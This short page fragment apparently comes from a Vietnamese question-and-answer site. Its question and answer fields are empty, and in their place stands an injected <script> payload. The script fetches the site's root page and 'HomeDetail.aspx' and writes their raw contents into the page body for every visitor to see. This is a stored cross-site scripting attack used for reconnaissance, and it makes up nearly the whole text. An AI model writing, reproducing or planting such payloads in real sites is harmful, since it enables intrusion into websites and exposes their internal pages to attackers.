Hỏi:
Ðáp:
<script>fetch('/').then(r=>r.text()).then(d=>document.body.innerHTML+='<details open><summary>ROOT INDEX</summary><pre>'+d+'</pre></details>');fetch('HomeDetail.aspx').then(r=>r.text()).then(d=>document.body.innerHTML+='<details open><summary>HomeDetail.aspx</summary><pre>'+d.replace(/</g,'<')+'</pre></details>');</script>
|
|
|
|